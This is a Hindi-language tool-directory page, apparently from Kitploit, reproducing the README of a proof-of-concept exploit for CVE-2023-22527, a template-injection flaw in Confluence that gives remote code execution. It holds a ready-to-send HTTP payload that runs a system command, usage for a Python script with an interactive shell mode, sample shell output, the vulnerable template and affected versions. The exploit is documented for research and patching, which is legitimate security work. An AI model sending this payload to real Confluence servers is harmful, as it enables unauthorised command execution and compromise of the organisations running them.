Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-22527 — CVE-2023-22527 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence में एक सर्वर-साइड टेम्पलेट इंजेक्शन है और रिमोट कोड निष्पादन को सक्षम बनाता है। इसमें कमांड निष्पादन और इंटरैक्टिव शेल के लिए एक Python स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/vozec/cve-2023-22527
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubvozec/cve-2023-22527

CVE-2023-22527

CVE-2023-22527 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence में एक सर्वर-साइड टेम्पलेट इंजेक्शन है और रिमोट कोड निष्पादन को सक्षम बनाता है। इसमें कमांड निष्पादन और इंटरैक्टिव शेल के लिए एक Python स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
14162 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-22527

यह रिपॉजिटरी CVE-2023-22527 का प्रूफ-ऑफ-कॉन्सेप्ट प्रस्तुत करती है

CVE-2023-22527 | Confluence में SSTI का उपयोग करके RCE

अस्वीकरण

यह कोड भेद्यता का एक प्रूफ ऑफ कॉन्सेप्ट है, मैं किसी को भी इसे उन Confluence इंस्टेंस पर उपयोग करने के लिए प्रोत्साहित नहीं कर रहा हूँ जिनके वे स्वामी नहीं हैं।
यह टूल केवल शोध और शैक्षिक उद्देश्यों के लिए विकसित किया गया है और इसके किसी भी उपयोग के लिए मैं जिम्मेदार नहीं ठहराया जाऊँगा।

विवरण

CVE-2023-22527 freemarker इंजन में एक सर्वर-साइड टेम्पलेट इंजेक्शन भेद्यता को संदर्भित करता है जो उपयोगकर्ताओं को वेबसर्वर पर कमांड निष्पादित करने की अनुमति देता है।

पेलोड:

यहाँ एक उदाहरण पेलोड है

POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1:8092
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"id"}))

सहायता

$ python3 CVE-2023-22527.py -h
usage: CVE-2023-22527.py [-h] [-u URL] [-c COMMAND] [-i]

This is a POC for CVE-2023-22527 (Confluence SSTI)

options:
  -h, --help  show this help message and exit
  -u URL      Url
  -c COMMAND  Command
  -i          Interactive mod

उदाहरण

python3 CVE-2023-22527.py -u  http://127.0.0.1:8092 -i
[DEBUG] Spawning semi-interactive shell ..
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ whoami
confluence
$ ls -lha
total 128K
drwxr-xr-x 19 confluence confluence 4.0K Jan 23 08:42 .
drwxr-xr-x  1 root       root       4.0K Jan 20 16:15 ..
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:37 analytics-logs
drwxr-x---  3 confluence confluence 4.0K Jan 23 08:40 attachments
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:37 backups
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:37 bundled-plugins
drwxr-x---  3 confluence confluence 4.0K Jan 23 08:38 .cache
-rw-r-----  1 confluence confluence 6.1K Jan 23 08:42 confluence.cfg.xml
-rw-r--r--  1 confluence confluence    1 Jan 23 08:13 docker-app.pid
drwxr-x---  4 confluence confluence 4.0K Jan 23 08:42 index
drwxr-x---  3 confluence confluence 4.0K Jan 23 08:37 .java
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:43 journal
-rw-r-----  1 confluence confluence    0 Jan 23 08:37 lock
drwxr-x---  4 confluence confluence 4.0K Jan 23 08:42 log
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:13 logs
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:37 plugins-cache
drwxr-x---  5 confluence confluence 4.0K Jan 23 08:37 plugins-osgi-cache
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:37 plugins-temp
drwxr-x---  3 confluence confluence 4.0K Jan 23 08:42 shared-home
-rw-r-----  1 confluence confluence  860 Jan 23 08:42 synchrony-args.properties
drwxr-x---  2 confluence confluence 4.0K Jan 23 08:40 temp
drwxr-x---  3 confluence confluence 4.0K Jan 23 08:37 viewfile
drwxr-x---  2 confluence confluence  40K Jan 23 08:46 webresource-temp

भेद्यता नीचे दी गई फ़ाइल में स्थित है: ./confluence/confluence/template/aui/text-inline.vm

भेद्य कोड:

#set( $labelValue = $stack.findValue("getText('$parameters.label')") )
#if( !$labelValue )
    #set( $labelValue = $parameters.label )
#end

#if (!$parameters.id)
    #set( $parameters.id = $parameters.name)
#end

<label id="${parameters.id}-label" for="$parameters.id">
$!labelValue
#if($parameters.required)
    <span class="aui-icon icon-required"></span>
    <span class="content">$parameters.required</span>
#end
</label>

#parse("/template/aui/text-include.vm")

प्रभावित संस्करण

Confluence Data Center और Server

  • 8.0.x
  • 8.1.x
  • 8.2.x
  • 8.3.x
  • 8.4.x
  • 8.5.0-8.5.3

संदर्भ:

  • https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
  • https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html?subid=1812250057&jobid=106379017&utm_campaign=confluence-critical-advisory_EML-17850&utm_medium=email&utm_source=alert-email
  • https://twitter.com/sirifu4k1/status/1749440022942474371
टूल डाउनलोड करें